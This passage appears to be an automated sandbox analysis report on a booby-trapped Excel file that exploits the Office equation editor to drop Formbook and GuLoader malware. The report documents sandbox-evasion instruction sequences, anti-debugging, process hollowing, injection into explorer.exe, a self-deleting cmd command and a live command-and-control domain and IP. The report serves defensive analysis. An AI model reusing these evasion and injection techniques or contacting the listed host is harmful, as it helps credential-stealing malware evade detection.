      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA20 NtQueryInformationFile,9_2_020AFA20
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA50 NtEnumerateValueKey,9_2_020AFA50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAB8 NtQueryValueKey,9_2_020AFAB8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB50 NtCreateKey,9_2_020AFB50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBB8 NtQueryInformationToken,9_2_020AFBB8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBE8 NtQueryVirtualMemory,9_2_020AFBE8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF8CC NtWaitForSingleObject,9_2_020AF8CC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF938 NtWriteFile,9_2_020AF938
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1930 NtSetContextThread,9_2_020B1930
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFE24 NtWriteVirtualMemory,9_2_020AFE24
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFEA0 NtReadVirtualMemory,9_2_020AFEA0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFF34 NtQueueApcThread,9_2_020AFF34
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFB4 NtCreateSection,9_2_020AFFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFFC NtCreateProcessEx,9_2_020AFFFC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC30 NtOpenProcess,9_2_020AFC30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC48 NtSetInformationFile,9_2_020AFC48
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0C40 NtGetContextThread,9_2_020B0C40
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC60 NtMapViewOfSection,9_2_020AFC60
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC90 NtUnmapViewOfSection,9_2_020AFC90
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD5C NtEnumerateKey,9_2_020AFD5C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD8C NtDelayExecution,9_2_020AFD8C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1D80 NtSuspendThread,9_2_020B1D80
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D50 NtCreateFile,9_2_00099D50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E00 NtReadFile,9_2_00099E00
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E80 NtClose,9_2_00099E80
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F30 NtAllocateVirtualMemory,9_2_00099F30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D4B NtCreateFile,9_2_00099D4B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DA4 NtCreateFile,9_2_00099DA4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DFE NtReadFile,9_2_00099DFE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E7A NtClose,9_2_00099E7A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F2B NtAllocateVirtualMemory,9_2_00099F2B
      Source: Unique food order.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: svchost[1].exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Unique food order.xlsx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR80B.tmp
      Source: C:\Windows\SysWOW64\cmd.exe, Console Write: C:\Users\Public\vbc.exe
      Source: C:\Windows\SysWOW64\cmd.exe, Console Write: Access is denied
      Source: C:\Users\Public\vbc.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
      Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\vbc.exe, File read: C:\Windows\System32\drivers\etc\hosts
      Source: Unique food order.xlsx, Virustotal: Detection: 24%
      Source: Unique food order.xlsx, ReversingLabs: Detection: 22%
      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknown, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknown, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknown, Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknown, Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
      Source: Window Recorder, Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: Unique food order.xlsx, Static file information: File size 2303488 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Unique food order.xlsx, Initial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsx, Initial sample: OLE indicators encrypted = True

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara match, File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040984F push ecx; retf 4_2_004098B0
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00409D50 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00409D55 push edi; ret 4_2_00409D5D
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406910 pushad ; iretd 4_2_00406914
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406653 pushad ; iretd 4_2_00406654
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00407FAA push esp; ret 4_2_00407FB1
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
      Source: C:\Users\Public\vbc.exe, Code function: 5_2_1E99DFA1 push ecx; ret 5_2_1E99DFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_020BDFA1 push ecx; ret 9_2_020BDFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_000969BB push esi; ret 9_2_000969BC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0008AB07 push ds; retf 9_2_0008AB09
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_00094E05 push ss; retf 9_2_00094E06
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009CF5C push eax; ret 9_2_0009CF62
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exe, Process information set: NOOPENFILEERRORBOX
      Source: Unique food order.xlsx, Stream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)

      Malware Analysis System Evasion:

      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Tries to detect Any.run
      Source: C:\Users\Public\vbc.exe, File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exe, File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: vbc.exe, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 0000000000314F13 second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 0000000000314FA0 second address: 0000000000314FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 00000000001B4FA0 second address: 00000000001B4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E46CBC9Dh 0x0000001f popad 0x00000020 call 00007FA1E46CB971h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exe, RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, RDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376, Thread sleep time: -360000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376, Thread sleep time: -60000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 3008, Thread sleep time: -420000s >= -30000s
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp, Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmp, Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmp, Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exe, Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000 4_2_0031044B
      Hides threads from debuggers
      Source: C:\Users\Public\vbc.exe, Thread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exe, Process queried: DebugPort
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Process queried: DebugPort
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Users\Public\vbc.exe, Code function: 4_2_00312F56 LdrInitializeThunk, 4_2_00312F56
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B548D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Command and Scripting Interpreter 1 | Path Interception | Process Injection 412 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 631 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 23 | LSASS Memory | Virtualization/Sandbox Evasion 23 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Process Injection 412 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 22 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 31 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 22 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

      Behavior Graph

      [Behavior graph image not reproduced. Behavior Graph ID: 320235; Sample: Unique food order.xlsx; Startdate: 19/11/2020; Architecture: WINDOWS; Score: 100.]
      Process tree recovered from the graph labels:
      • EXCEL.EXE started; dropped C:\Users\user\...\~$Unique food order.xlsx (data)
      • EQNEDT32.EXE started; DNS/IP: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu 103.125.191.5, 49165, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam; dropped C:\Users\user\AppData\...\svchost[1].exe (PE32) and C:\Users\Public\vbc.exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      • EQNEDT32.EXE -> vbc.exe started; signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering), Tries to detect Any.run, Tries to detect virtualization through RDTSC time measurements, 2 other signatures
      • vbc.exe -> vbc.exe started; signatures: Modifies the context of a thread in another process (thread injection), Tries to detect Any.run, Maps a DLL or memory area into another process, 3 other signatures
      • vbc.exe -> explorer.exe injected
      • explorer.exe -> NAPSTAT.EXE started; signature: Tries to detect virtualization through RDTSC time measurements
      • explorer.exe -> autoconv.exe started
      • NAPSTAT.EXE -> cmd.exe started


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label | Link
      Unique food order.xlsx | 25% | Virustotal | | Browse
      Unique food order.xlsx | 23% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882 |

      Dropped Files

      No Antivirus matches

